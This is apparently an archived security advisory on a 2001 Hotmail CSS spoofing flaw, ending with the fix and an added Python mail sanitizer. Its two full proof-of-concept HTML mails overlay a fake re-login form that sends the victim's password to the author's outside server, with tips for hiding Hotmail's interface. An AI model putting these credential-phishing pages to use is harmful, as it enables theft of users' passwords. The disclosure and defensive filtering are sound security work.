COMMAND
Hotmail
SYSTEMS AFFECTED
Hotmail
PROBLEM
Gregory Duchemin found the following. In his advisory, Ben Li
described a bug in most next-generation browsers: CSS combined
with a broken image leads to a general corruption of HTML links:
http://oliver.efri.hr/~crv/security/bugs/Others/webmail4.html
A similar problem exists with CSS used inside a web-based mail
server, this time with a plain image and no link needed. It is
possible to craft mail trojans that recover personal user
information such as passwords. This is no longer a bug in the
browsers, but in the implementation of the servers' HTML filters.
Gregory tested this with Hotmail and MSIE 4/5 (NT) and it worked
really well. In fact we have here a very serious hole.
It was possible (at least with Hotmail) to use a background layer
with a fully blank picture to erase the whole browser screen (the
Hotmail desktop) and, by using another layer on top with a
slightly modified password prompt, it would be easy to fool most
people.
A simple 'img src' pointing to an external 1x1 white pixel image,
expanded to 1280x768, is enough for the background layer and will
clean everything.
Since the new frame appears over the first one and not in a new
window as is usual, the Microsoft top-frame warning that the user
is leaving Hotmail no longer appears.
So, from the user's side, right after clicking on the mail to read
it, the screen shows him what he would trust to be the Hotmail
re-login page. The URL in the browser is still Hotmail, so he has
no obvious reason to worry, unless he went through the same login
page just 2 minutes before.
The re-login page, embedded in the mail inside the top layer, won't
be exactly the same as the original one: the form may be changed
to use an insecure HTTP connection and the GET method while
pointing to the attacker's web server. With the password then
sitting in his web server logs, the attacker may finally redirect
the victim to the real page.
Below is only the "skeleton" of a mail exploit, since the full
version would need copyrighted material.
<div align="left">
<div id="layer1" style="width:99px; height:99px; position:absolute;
left:0px; top:0px; z-index:0;">
<!-- First Layer, a big blank screen to hide Hotmail desk -->
<div id="layer2" style="position:absolute; left:140; top:100; z-index:0;">
<!-- Layer 2, will show up text, pics, form -->
<!-- Here the new hotmail login.html that point to our web server
Need Microsoft login page with all copyrighted
logos, banners ... -->
</div>
</div>
Gregory Duchemin sent the following as the proof of concept for
the CSS Hotmail spoofing / password recovery. To try it, mail it
only to yourself, not to others. All graphics were made by the
author to show explicitly that this is not the real Hotmail
re-login page, thus preventing any abuse and copyright violation.
This worked fine with MSIE; it would need some small changes to
work on Netscape. Note that there are 2 versions here.
<html>
<!-- H0RSEM4IL.c0m , trojanized mail to catch users' passwords.
A proof of concept for most web-based mailers.
Tested on Hotmail with MSIE.
To try it, just mail this page to a Hotmail mailbox, but remember:
this page is for educational purposes ONLY !
-->
<body>
<div align="left">
<div id="layer1" style="width:1280px; height:768px; position:absolute; left:0px; top:0px; z-index:0;">
<!-- First Layer, a big blank screen to hide Hotmail desk -->
<div id="layer2" style="position:absolute; left:40; top:100; z-index:0;">
<!-- Layer 2, will show up the near-original hotmail re-enter
password screen ;) -->
<!-- Here we have slightly modified the original hotmail login.html to point
to our own site with GET method to catch the password in our logs -->
<form name="passwordform" target="layer2" action="http://c3rber.multimania.com/merci.txt" method="GET" target="_top" AUTOCOMPLETE="OFF" >
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td colspan=2>
<table cellpadding=0 cellspacing=0 border=0 width="100%"><tr><td>
<a href="javascript:void()" target="_top"><img src="http://c3rber.multimania.com/horsemail.gif" width=468 height=60 border=0 alt=""></a>
</td>
<td align="CENTER" nowrap>
<img src="http://c3rber.multimania.com/pass.gif" width=140 height=44 border=0 alt="Find Out More About Passport"><br>
<a href="javascript:void()" target="_top"><font class="f" size=2>Help</font></a><br>
</td></tr></table>
</td>
</tr><tr>
<td bgcolor="#cccc99"><font class="f" size=4><b>Please re-enter your password at your own risk</b></font></td>
<td valign="top"><table width="100%" border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor="#cccc99"></td></tr></table></td>
</tr>
<tr><td height="6"></td></tr>
<tr valign="top">
<td><font class="s">
</font>
</td>
<td rowspan=4><font class="s">
</font>
</td>
</tr>
<tr>
<td>
<font class="f" size=2><b>&lt;victim@hotmail.com&gt;</b></font>
<input type="hidden" name="domain" value="hotmail.com">
<table cellpadding=0 cellspacing=0>
<tr>
<td height=35 valign="middle"><font class="sbd">Password</font> </td>
<td><input type="password" name="passwd" size="16" maxlength="16"></td>
<td width=22 valign="middle" align="center"> </td>
<td><input type="submit" name="enter" value="Sign in"></td>
</tr>
<tr>
<td></td>
<td colspan="2"><font class="f" size=2><b><a href="javascript:void()" target="_top">Change
User</a></b></font></td>
</tr>
</table>
</form>
</table>
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td>
<font class="s">Fake © 2001 P0w3rsoft Corporation. All rights not reserved.</font>
<a href="javascript:void()"><font class="s">H0rsemail TERMS OF USE and NOTICES</font></a>
<a href="javascript:void()"><font class="s">untrusted Privacy Statement</font></a>
</td>
</tr>
</table>
</div>
<p align="center">
<img src="http://c3rber.multimania.com/hotmail.jpg" width="1280" height="950" border="0" >
</div>
</div>
</body>
<!--
Gregory Duchemin - Security Consultant -
NEUROCOM CANADA
1001 bd Maisonneuve Ouest - suite 200
H3A 3C8 Montreal - Quebec - CANADA
c3rb3r@hotmail.com
Original idea : Ben Li <bali@THOCK.COM>
-->
</html>
The above exploit is broken with MSIE 5.50: in fact the background
image won't appear at all. Anyway, it was a bad idea to use it.
Below is a new version that works with MSIE 4/5/5.50; the
background color is now fixed as a blank value (#ffffff) in the
div class (thus removing one useless connection).
The mail folders navigator input form that wrongly showed through
on the top layer was fixed too by adjusting its properties
(select { visibility: hidden }). The scrollbar at the bottom was
reduced with the help of the class width parameter. You will have
to choose it according to the screen resolution of the trojan's
recipient; if you don't know it, just take a big value.
But this exploit isn't absolutely perfect: the advertising iframe
at the top middle is still there, since we can't use JavaScript to
modify its properties. This iframe tag is really interesting, but
it is already filtered by Hotmail and Yahoo; it may still work on
some of the sites in the cross-vulnerable sites list that was
circulated here some weeks ago.
NOTE: To work properly, the message MUST BEGIN with the html tag
(nothing above). Don't use it for any malicious activity:
<html>
<div align="left">
<style type="text/css">
<!--
div.trojan {
background-color: #ffffff;
background-repeat: repeat;
position: absolute;
width: 850px;
height: 950px;
top: 0px;
left: 0px;
visibility: visible;
z-index: 0;
font-family: times;
font-size: 72px;
}
-->
</style>
<div id="layer1" class="trojan">
<div id="layer2" class="trojan" style="left:80px;top:100px;
">
<form name="passwordform" target="_blank" action="http://c3rber.multimania.com/merci.txt" method="GET" AUTOCOMPLETE="OFF" >
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td colspan=2>
<table cellpadding=0 cellspacing=0 border=0 width="100%"><tr><td>
<a href="#" ><img src="http://c3rber.multimania.com/horsemail.gif" width=468 height=60 border=0 alt=""></a>
</td>
<td align="CENTER" nowrap>
<img src="http://c3rber.multimania.com/pass.gif" width=140 height=44 border=0 alt="Find Out More About Passport"><br>
<a href="#" ><font class="f" size=2>Help</font></a><br>
</td></tr></table>
</td>
</tr><tr>
<td bgcolor="#cccc99"><font class="f" size=4><b>Please re-enter your password at your own risk</b></font></td>
<td valign="top"><table width="100%" border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor="#cccc99"></td></tr></table></td>
</tr>
<tr><td height="6"></td></tr>
<tr valign="top">
<td><font class="s">
</font>
</td>
<td rowspan=4><font class="s">
</font>
</td>
</tr>
<tr>
<td>
<font class="f" size=2><b>&lt;victim@hotmail.com&gt;</b></font>
<table cellpadding=0 cellspacing=0>
<tr>
<td height=35 valign="middle"><font class="sbd">Password</font> </td>
<td><input type="password" name="passwd" size="16" maxlength="16"></td>
<td width=22 valign="middle" align="center"> </td>
<td><input type="submit" name="enter" value="Sign in"></td>
</tr>
<tr>
<td></td>
<td colspan="2"><font class="f" size=2><b><a href="#" >Change
User</a></b></font></td>
</tr>
</table>
</form>
</table>
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td>
<font class="s">Hotmail © Cross-scripting/css 2001 Proof of concept. C3rb3r (January 2001).</font>
<a href="javascript:Filtered()" target="_blank"><font class="s">H0rsemail TERMS OF USE and NOTICES</font></a>
<a href="javascript:Filtered()" target="_blank"><font class="s">untrusted Privacy Statement</font></a>
</td>
</tr>
</table>
</div>
<p align="center">
</div>
</div>
<style type="text/css">
<!--
input { visibility: hidden }
select { visibility: hidden; color: #ffffff }
option { visibility: hidden; color: #ffffff }
iframe { visibility: hidden; color: #ffffff }
div {
background-color: #ffffff;
background-repeat: repeat;
position: absolute;
width: 0px;
height: 0px;
top: 0px;
left: 0px;
visibility: hidden;
z-index: 1;
font-family: times;
font-size: 72px;
}
-->
</style>
<!--
Gregory Duchemin - Security Consultant -
NEUROCOM CANADA
1001 bd Maisonneuve Ouest - suite 200
H3A 3C8 Montreal - Quebec - CANADA
c3rb3r@hotmail.com
Just a proof of concept, don't use it for illegal purposes
Original idea : Ben Li <bali@THOCK.COM>
-->
<div id="trash">
<!--
SOLUTION
Hotmail has fixed the "CSS Hotmail spoofing / password recovery"
bug. Hotmail will replace "position: absolute" by "position:
static".
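As an added example (not part of the original advisory and not Hotmail's own filter), the fix described under SOLUTION generalized into a small Python filter: it rewrites absolute and fixed positioning to static in both <style> blocks and style attributes, drops the form/input/iframe tags the overlay relies on, terminates the dangling comment left by the trailing `<div id="trash"> <!--`, and returns counts a detection rule can score before rendering. The function names and the sample message are constructed for this example.

```python
import re

# Positioning that lets a mail body paint over the webmail UI; Hotmail's
# fix rewrote "absolute" to "static" so layers flow within the page.
OVERLAY_PROP = re.compile(r"position\s*:\s*(absolute|fixed)", re.I)
# Tags the overlay trick relies on: form/inputs to collect the password,
# selects/options hidden by CSS, iframes and scripts.
DROP_TAG = re.compile(r"</?\s*(form|input|select|option|iframe|script)\b[^>]*>", re.I)
COMMENT = re.compile(r"<!--.*?-->", re.S)
STYLE_BLOCK = re.compile(r"(<style\b[^>]*>)(.*?)(</style>)", re.I | re.S)
STYLE_ATTR = re.compile(r'(style\s*=\s*")([^"]*)(")', re.I)

def neutralize_css(css):
    """Rewrite absolute/fixed positioning to static; other rules survive."""
    return OVERLAY_PROP.sub("position: static", css)

def overlay_indicators(html):
    """Counts a detection rule can score before a message is rendered."""
    return {
        "overlay_layers": len(OVERLAY_PROP.findall(html)),
        "forms": len(re.findall(r"<form\b", html, re.I)),
        "password_fields": len(re.findall(r'type\s*=\s*"?password', html, re.I)),
        "unterminated_comment": "<!--" in COMMENT.sub("", html),
    }

def sanitize_mail_html(html):
    """Hypothetical server-side filter for HTML mail shown in a webmail UI."""
    # 1. Terminate a dangling comment: the exploit ends with '<div id="trash"> <!--'
    #    so everything the webmail UI renders after the body gets swallowed.
    if "<!--" in COMMENT.sub("", html):
        html += "-->"
    # 2. Drop tags that collect input or embed foreign content (text stays).
    html = DROP_TAG.sub("", html)
    # 3. Neutralize positioning in <style> blocks and in style="" attributes.
    html = STYLE_BLOCK.sub(lambda m: m[1] + neutralize_css(m[2]) + m[3], html)
    html = STYLE_ATTR.sub(lambda m: m[1] + neutralize_css(m[2]) + m[3], html)
    return html

# Constructed sample mirroring the exploit's skeleton (not the real mail).
SAMPLE = (
    '<html><style type="text/css"><!-- div.t { position: absolute; '
    'width: 850px; } --></style>'
    '<div class="t"><div style="position:absolute; left:80px">'
    '<form action="http://attacker.invalid/log" method="GET">'
    '<input type="password" name="passwd"></form></div></div>'
    '<div id="trash"><!--'
)

if __name__ == "__main__":
    print(overlay_indicators(SAMPLE), sanitize_mail_html(SAMPLE))
```

A production filter would run these rewrites on a parsed DOM rather than on raw text with regular expressions, which attribute quoting tricks can evade.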